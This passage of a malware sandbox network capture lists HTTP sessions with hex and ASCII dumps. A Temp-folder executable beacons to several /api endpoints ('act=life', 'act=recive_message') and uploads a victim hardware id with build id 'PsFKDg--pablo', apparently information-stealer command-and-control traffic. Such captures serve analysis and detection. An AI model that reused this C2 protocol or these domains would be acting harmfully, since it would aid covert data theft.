2024-12-19 09:10:56 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-19 09:11:11 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3tr80i4pqueu70if16ndj47osc; expires=Mon, 14 Apr 2025 02:57:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DN%2B95h1A87jx%2BEL70jk1RDBv8XMd9kkX1vyN%2F8uNZxMv9e%2Fktz09FrXs7jCFhlv1cpQBVJbDHcxDPYyqMz7SmCJM1Jg3QUnlYFKntkbvs2%2Fdv1FbJX5nYd4vSMqxdIx3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46432ccd0a43f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1662&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=944&delivery_rate=1722713&cwnd=204&unsent_bytes=0&cid=f3e4701f10cf96c7&ts=14613&x=0"
2024-12-19 09:11:11 UTC	246	IN	Data Raw: 63 34 30 0d 0a 2b 57 6a 32 70 47 70 35 63 6d 2f 54 59 64 33 44 34 4a 46 76 39 49 45 6d 48 67 55 51 50 41 56 31 74 6c 67 78 68 31 35 35 32 45 32 43 53 6f 43 47 55 45 31 65 54 61 41 45 2f 2f 6d 55 34 78 71 52 72 51 52 2f 59 54 49 47 59 78 54 61 4b 31 53 72 66 41 2b 31 62 38 4d 4f 6c 38 67 5a 48 46 35 4e 74 68 6e 2f 2b 62 76 71 54 5a 48 76 42 43 51 6e 64 56 5a 6e 46 4e 6f 36 55 4f 77 78 43 62 51 75 6b 51 53 52 7a 41 38 61 46 67 36 2f 44 4c 69 6d 68 66 41 46 6d 75 68 4c 64 6d 67 79 45 43 63 51 7a 48 6f 4c 70 52 4d 63 72 43 79 30 43 59 58 50 53 41 52 65 46 50 45 45 73 2b 48 61 73 77 36 52 34 30 70 34 59 58 74 55 62 52 33 53 4f 31 58 74 4c 68 43 2b 4a 5a 45 4b 6b 73 30 46 45 77 49 44 74 51 75 7a 6f 49 2f 77 54 64 69 6a 51 32 51 6e 4b Data Ascii: c40+Wj2pGp5cm/TYd3D4JFv9IEmHgUQPAV1tlgxh1552E2CSoCGUE1eTaAE//mU4xqRrQR/YTIGYxTaK1SrfA+1b8MOl8gZHF5Nthn/+bvqTZHvBCQndVZnFNo6UOwxCbQukQSRzA8aFg6/DLimhfAFmuhLdmgyECcQzHoLpRMcrCy0CYXPSAReFPEEs+Hasw6R40p4YXtUbR3SO1XtLhC+JZEKks0FEwIDtQuzoI/wTdijQ2QnK
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 68 34 30 4a 64 63 72 51 76 41 78 43 37 78 76 68 45 53 4e 68 67 38 58 55 46 58 78 43 37 4f 76 68 2f 41 43 6b 65 4a 45 62 6d 68 79 58 57 38 66 30 44 42 63 36 6a 4d 56 73 43 69 54 41 35 50 4a 44 78 4d 57 41 72 4a 44 38 65 47 46 36 30 33 4f 6f 32 52 73 5a 48 46 4b 61 67 61 55 4a 52 33 38 66 42 79 32 62 38 4e 4b 6b 73 67 4a 46 68 41 66 75 51 69 30 70 4a 44 34 42 4a 76 75 52 48 46 74 66 56 31 6e 45 4e 34 77 58 4f 38 34 46 72 63 70 6d 77 72 55 69 45 67 63 43 45 33 70 51 35 79 6b 6b 76 51 42 67 4b 46 2b 50 48 67 38 52 79 63 51 32 48 6f 4c 70 54 51 65 75 53 79 51 42 5a 66 4f 41 77 6b 51 48 37 63 4f 75 72 4f 45 39 67 4f 63 34 46 5a 32 61 58 52 64 62 68 7a 64 50 31 54 68 66 46 58 36 4b 49 4e 4b 7a 49 59 70 46 68 73 42 75 78 53 2f 34 5a 32 39 46 4e 62 6b 53 44 77 2f Data Ascii: h40JdcrQvAxC7xvhESNhg8XUFXxC7Ovh/ACkeJEbmhyXW8f0DBc6jMVsCiTA5PJDxMWArJD8eGF603Oo2RsZHFKagaUJR38fBy2b8NKksgJFhAfuQi0pJD4BJvuRHFtfV1nEN4wXO84FrcpmwrUiEgcCE3pQ5ykkvQBgKF+PHg8RycQ2HoLpTQeuSyQBZfOAwkQH7cOurOE9gOc4FZ2aXRdbhzdP1ThfFX6KINKzIYpFhsBuxS/4Z29FNbkSDw/
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 75 55 64 42 50 69 4a 46 76 69 62 37 45 4a 67 4d 55 43 57 53 55 4f 76 77 32 34 74 38 4c 73 51 34 2b 6a 51 33 41 6e 4b 68 35 71 46 74 77 38 51 65 6f 78 47 4c 51 68 6c 41 2b 62 7a 67 67 62 48 51 69 31 43 4c 53 69 6a 2f 63 66 6e 4f 4e 4d 65 57 5a 34 56 43 64 5a 6c 44 31 4c 70 57 52 62 69 7a 69 51 53 4b 48 46 42 68 55 58 47 2f 45 63 38 62 6a 43 39 41 48 57 75 77 52 78 62 33 64 62 61 42 62 65 4e 46 62 76 4d 42 4f 30 4c 49 6b 46 6b 4d 59 45 45 78 6f 41 76 77 65 33 71 49 6e 34 43 35 62 69 54 6a 77 70 4d 6c 6c 2f 56 34 78 36 5a 2b 49 77 46 72 56 74 72 67 6d 61 79 41 38 4e 55 42 4c 2f 47 76 2b 6d 6a 72 4e 56 31 75 39 4e 66 47 78 34 57 6d 63 51 32 54 39 51 34 6a 38 57 76 53 57 56 44 5a 44 4b 41 52 59 57 44 62 59 48 75 72 4f 48 2b 67 47 61 6f 77 6f 38 59 47 6f 65 50 Data Ascii: uUdBPiJFvib7EJgMUCWSUOvw24t8LsQ4+jQ3AnKh5qFtw8QeoxGLQhlA+bzggbHQi1CLSij/cfnONMeWZ4VCdZlD1LpWRbiziQSKHFBhUXG/Ec8bjC9AHWuwRxb3dbaBbeNFbvMBO0LIkFkMYEExoAvwe3qIn4C5biTjwpMll/V4x6Z+IwFrVtrgmayA8NUBL/Gv+mjrNV1u9NfGx4WmcQ2T9Q4j8WvSWVDZDKARYWDbYHurOH+gGaowo8YGoeP
2024-12-19 09:11:11 UTC	159	IN	Data Raw: 66 70 57 52 62 73 79 61 4a 42 4a 72 50 42 52 30 59 43 72 38 4f 74 4b 65 4a 39 41 71 51 37 6b 78 78 59 6e 46 66 59 78 33 47 4f 56 6a 76 4d 52 48 36 59 64 73 4e 6a 49 5a 51 57 7a 63 42 6d 42 4f 6b 73 35 53 7a 45 74 6a 36 42 48 74 72 4d 67 59 6e 46 4e 73 7a 58 4f 30 30 46 4c 55 72 6c 51 79 53 79 77 30 55 47 68 2b 35 44 62 4b 71 6a 66 67 66 6c 75 35 41 63 47 4e 36 56 57 31 58 6d 6e 70 55 2f 58 78 44 2b 68 71 57 42 5a 54 46 48 6c 73 50 51 36 68 44 75 4b 33 43 71 30 32 61 0d 0a Data Ascii: fpWRbsyaJBJrPBR0YCr8OtKeJ9AqQ7kxxYnFfYx3GOVjvMRH6YdsNjIZQWzcBmBOks5SzEtj6BHtrMgYnFNszXO00FLUrlQySyw0UGh+5DbKqjfgflu5AcGN6VW1XmnpU/XxD+hqWBZTFHlsPQ6hDuK3Cq02a
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 33 63 64 63 0d 0a 37 55 52 7a 61 33 35 56 62 78 62 59 4e 46 54 67 4e 52 4f 79 50 5a 6f 4f 6e 4d 63 47 46 42 45 4a 74 41 61 37 70 6f 62 31 41 74 61 74 42 48 74 2f 4d 67 59 6e 4f 50 4d 50 45 63 51 47 57 36 56 68 67 6b 71 54 79 6b 68 44 55 41 47 79 44 37 65 75 68 50 6f 42 6e 4f 70 50 63 47 78 32 55 6d 34 53 30 6a 74 57 34 44 30 66 74 69 57 64 43 5a 66 4a 42 78 51 59 54 66 39 44 75 4c 6e 43 71 30 32 7a 39 45 39 79 59 54 4a 42 4b 51 36 55 50 56 2b 6c 5a 46 75 32 4a 70 30 4d 6b 63 6f 4a 48 52 67 49 75 51 65 2b 70 34 54 77 41 70 4c 6d 52 58 4e 6a 66 6c 42 74 46 74 55 32 57 4f 6f 33 48 76 70 68 32 77 32 4d 68 6c 42 62 49 51 36 6e 46 4b 2b 74 77 75 78 44 6a 36 4e 44 63 43 63 71 48 6d 59 46 33 6a 42 64 34 44 4d 65 75 53 43 63 42 35 4c 4b 41 68 49 59 43 37 34 4b 72 Data Ascii: 3cdc7URza35VbxbYNFTgNROyPZoOnMcGFBEJtAa7pob1AtatBHt/MgYnOPMPEcQGW6VhgkqTykhDUAGyD7euhPoBnOpPcGx2Um4S0jtW4D0ftiWdCZfJBxQYTf9DuLnCq02z9E9yYTJBKQ6UPV+lZFu2Jp0MkcoJHRgIuQe+p4TwApLmRXNjflBtFtU2WOo3Hvph2w2MhlBbIQ6nFK+twuxDj6NDcCcqHmYF3jBd4DMeuSCcB5LKAhIYC74Kr
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 42 6c 75 64 4a 66 48 56 39 57 57 41 65 33 79 68 5a 34 6a 73 51 73 69 53 55 44 49 62 4b 42 67 6b 56 48 36 4e 44 38 65 47 46 36 30 33 4f 6f 33 4a 37 64 32 4a 64 4a 53 62 43 4f 55 58 75 4d 52 66 36 4d 4e 55 54 31 4d 45 45 57 30 68 4e 74 77 79 32 6f 6f 33 79 42 4a 72 75 51 58 56 69 63 31 68 6a 48 64 34 36 56 65 4d 39 48 72 41 73 6d 67 43 64 77 51 41 63 45 78 2f 78 54 66 2b 6d 6d 72 4e 56 31 73 70 44 62 6d 6c 69 48 6e 68 5a 7a 58 70 55 36 58 78 44 2b 69 75 52 42 5a 44 42 42 42 30 56 43 37 77 43 73 4b 43 43 2f 41 6d 64 36 6b 4a 39 61 6e 64 54 59 77 58 65 4d 56 7a 70 4e 52 65 33 62 39 56 4b 6b 39 35 49 51 31 41 38 76 41 32 78 70 70 53 7a 45 74 6a 36 42 48 74 72 4d 67 59 6e 46 74 67 31 55 4f 6f 2f 47 4c 73 6c 69 52 69 59 7a 77 41 65 48 41 61 2f 42 61 32 6e 6a 66 Data Ascii: BludJfHV9WWAe3yhZ4jsQsiSUDIbKBgkVH6ND8eGF603Oo3J7d2JdJSbCOUXuMRf6MNUT1MEEW0hNtwy2oo3yBJruQXVic1hjHd46VeM9HrAsmgCdwQAcEx/xTf+mmrNV1spDbmliHnhZzXpU6XxD+iuRBZDBBB0VC7wCsKCC/Amd6kJ9andTYwXeMVzpNRe3b9VKk95IQ1A8vA2xppSzEtj6BHtrMgYnFtg1UOo/GLsliRiYzwAeHAa/Ba2njf
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 53 57 77 6e 50 42 35 32 45 4d 56 36 43 2f 4d 73 44 4c 30 77 31 52 50 55 77 51 52 62 53 45 32 33 43 72 6d 6d 68 50 30 66 6b 2b 56 4c 63 32 35 37 57 6d 38 55 31 44 35 58 34 6a 6b 59 74 69 53 63 43 5a 76 43 41 52 55 5a 41 76 46 4e 2f 36 61 61 73 31 58 57 77 6c 39 2f 61 33 38 65 65 46 6e 4e 65 6c 54 70 66 45 50 36 49 35 55 50 6c 4d 77 4f 48 78 55 4c 75 77 61 2f 71 6f 48 38 43 5a 44 6e 53 33 78 73 65 31 39 68 45 74 34 78 56 65 67 2f 48 62 78 76 31 55 71 54 33 6b 68 44 55 43 32 71 44 72 4f 6d 77 75 78 44 6a 36 4e 44 63 43 63 71 48 6d 77 62 30 44 31 54 36 44 38 54 76 79 75 52 44 35 54 4f 47 68 4d 51 43 71 4d 52 76 36 69 48 2f 77 36 57 35 30 4a 31 59 58 46 61 4a 31 6d 55 50 55 75 6c 5a 46 75 58 49 35 77 6a 6b 39 31 49 42 46 34 55 38 51 53 7a 34 64 71 7a 44 4a 33 Data Ascii: SWwnPB52EMV6C/MsDL0w1RPUwQRbSE23CrmmhP0fk+VLc257Wm8U1D5X4jkYtiScCZvCARUZAvFN/6aas1XWwl9/a38eeFnNelTpfEP6I5UPlMwOHxULuwa/qoH8CZDnS3xse19hEt4xVeg/Hbxv1UqT3khDUC2qDrOmwuxDj6NDcCcqHmwb0D1T6D8TvyuRD5TOGhMQCqMRv6iH/w6W50J1YXFaJ1mUPUulZFuXI5wjk91IBF4U8QSz4dqzDJ3
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 45 30 51 4a 78 61 55 59 6d 72 38 66 41 33 36 64 38 6c 45 31 4e 52 49 51 31 42 4b 73 68 47 74 70 34 48 6c 44 74 48 64 65 6c 74 78 65 46 6c 33 45 4d 4d 31 45 36 74 38 46 50 70 33 6f 6b 71 64 77 52 4d 4b 42 67 43 68 42 50 2b 65 7a 4c 4d 56 31 72 73 45 53 57 52 38 55 47 41 42 78 58 64 30 38 7a 59 63 71 69 69 4d 42 64 53 49 53 42 31 51 56 65 4a 4e 2f 36 57 54 73 31 58 47 73 52 38 70 4e 43 55 4f 4e 51 69 61 49 78 50 7a 66 45 50 6f 59 64 73 59 31 4a 35 49 58 42 4d 66 6f 77 57 38 74 34 47 30 4d 36 6a 45 58 6e 46 68 5a 55 39 5a 4b 64 4d 67 58 75 4d 72 43 76 59 36 6d 41 53 61 77 52 35 62 58 6b 32 2b 51 2b 65 59 77 72 74 4e 71 61 30 45 5a 43 63 71 48 6c 49 55 32 6a 52 55 38 79 31 57 6e 54 57 57 44 49 50 58 53 46 56 51 43 2f 46 62 37 2b 2f 43 39 78 7a 57 75 78 51 75 Data Ascii: E0QJxaUYmr8fA36d8lE1NRIQ1BKshGtp4HlDtHdeltxeFl3EMM1E6t8FPp3okqdwRMKBgChBP+ezLMV1rsESWR8UGABxXd08zYcqiiMBdSISB1QVeJN/6WTs1XGsR8pNCUONQiaIxPzfEPoYdsY1J5IXBMfowW8t4G0M6jEXnFhZU9ZKdMgXuMrCvY6mASawR5bXk2+Q+eYwrtNqa0EZCcqHlIU2jRU8y1WnTWWDIPXSFVQC/Fb7+/C9xzWuxQu
2024-12-19 09:11:11 UTC	1369	IN	Data Raw: 59 42 78 43 31 63 32 77 49 4f 75 53 47 56 44 59 4c 58 53 46 56 51 41 76 46 62 68 75 48 4b 73 7a 4c 59 6f 31 77 38 50 7a 4a 72 5a 42 6e 61 50 55 58 30 63 54 79 30 4b 4a 6f 63 68 4e 45 48 57 31 35 4e 74 30 50 6e 38 38 79 7a 43 59 65 6a 48 43 77 31 4b 51 73 30 51 49 52 6f 54 4b 73 6c 57 36 78 76 77 31 6a 61 68 68 70 62 53 45 33 32 41 4b 32 7a 68 50 41 62 6c 61 52 36 51 6b 42 38 57 57 59 42 78 43 31 63 71 68 49 74 6d 78 47 6c 48 35 66 49 42 68 77 47 48 50 46 4e 2f 36 37 43 71 7a 54 57 71 77 52 44 4b 54 4a 47 4a 30 2b 55 44 31 44 72 4d 68 79 73 50 74 59 74 6d 73 45 4a 44 51 41 61 76 6b 79 52 6c 36 4f 7a 51 39 62 6c 42 43 51 31 50 42 35 6a 42 70 52 69 41 37 64 6e 54 75 6c 34 79 31 69 4c 69 42 46 62 42 6b 33 70 55 66 48 68 6b 4c 4e 56 31 71 52 48 62 6e 56 30 58 Data Ascii: YBxC1c2wIOuSGVDYLXSFVQAvFbhuHKszLYo1w8PzJrZBnaPUX0cTy0KJochNEHW15Nt0Pn88yzCYejHCw1KQs0QIRoTKslW6xvw1jahhpbSE32AK2zhPAblaR6QkB8WWYBxC1cqhItmxGlH5fIBhwGHPFN/67CqzTWqwRDKTJGJ0+UD1DrMhysPtYtmsEJDQAavkyRl6OzQ9blBCQ1PB5jBpRiA7dnTul4y1iLiBFbBk3pUfHhkLNV1qRHbnV0X

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	50021	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:57 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 65 71 61 53 34 32 77 39 30 71 62 66 4a 76 2b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 65 31 39 33 38 62 32 30 38 30 62 37 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ieqaS42w90qbfJv+.1Context: 32ae1938b2080b70
2024-12-19 09:10:57 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:10:57 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 69 65 71 61 53 34 32 77 39 30 71 62 66 4a 76 2b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 65 31 39 33 38 62 32 30 38 30 62 37 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ieqaS42w90qbfJv+.2Context: 32ae1938b2080b70<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:10:57 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 65 71 61 53 34 32 77 39 30 71 62 66 4a 76 2b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 61 65 31 39 33 38 62 32 30 38 30 62 37 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ieqaS42w90qbfJv+.3Context: 32ae1938b2080b70<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:10:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:10:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 32 61 4a 44 68 78 31 41 6e 55 65 6b 70 46 39 2b 47 79 65 6e 4f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 2aJDhx1AnUekpF9+GyenOw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	50047	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lossekniyyt.click
2024-12-19 09:11:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:11:20 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hv6hj734dt0vd8u5an85can6f9; expires=Mon, 14 Apr 2025 02:57:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a43DEY12OmNPojPq4l%2FA4nQ80%2Fi8cYHT4B94kTEuF6sf8h%2F%2FPF3x%2BborBf7r62v1n8IPJpytXP0gndjlw3UgBeh5m1ggXAMZsrdLEyv53poqSGM4THDKkHQW90OXWFo0bJQ55g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464369fd687cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1898&rtt_var=730&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1480730&cwnd=230&unsent_bytes=0&cid=ba5b7d40a4bb331b&ts=14085&x=0"
2024-12-19 09:11:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:11:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50072	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:13 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RPY8CBAFLIWLZVYMLP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12859 Host: grannyejh.lat
2024-12-19 09:11:13 UTC	12859	OUT	Data Raw: 2d 2d 52 50 59 38 43 42 41 46 4c 49 57 4c 5a 56 59 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 50 59 38 43 42 41 46 4c 49 57 4c 5a 56 59 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 50 59 38 43 42 41 46 4c 49 57 4c 5a 56 59 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f Data Ascii: --RPY8CBAFLIWLZVYMLPContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--RPY8CBAFLIWLZVYMLPContent-Disposition: form-data; name="pid"2--RPY8CBAFLIWLZVYMLPContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-19 09:11:30 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bsr00qukmg2p5jrbnq75sj75ki; expires=Mon, 14 Apr 2025 02:57:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFNmKurcp%2Fe68sQ3SAoILMg9DwmrxWQEXm%2FYl3%2FG2GBMVBfaVQAHb3WAQD1znoUqqZqzCDBpe1ETMDrKTOHM7JCZVQQNLY3%2BfOSVLVZiTico6h3IYoGdr%2BHBjSxLxEiQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464393d8b0de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1533&rtt_var=596&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13796&delivery_rate=1803582&cwnd=240&unsent_bytes=0&cid=3556395925071426&ts=17342&x=0"
2024-12-19 09:11:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:11:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	50078	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cheapptaxysu.click
2024-12-19 09:11:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:11:27 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hfp0jm672hg337lsvjbdedrp60; expires=Mon, 14 Apr 2025 02:57:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ybckv9pSFA%2F4PjmkImPbGjOiptyZG2zGhS7d0QWEOubv06zW4toOaM6PYtR3DfwJt1DLMbz6tBv2JHbVLV0rv6jZUHxVThI8%2F1Y3VD9ujNkZlE%2BNSbKlwMTwQa1Am0feemS532Y%3D"}],"group":"cf-nel","max_age":604800} NEL: 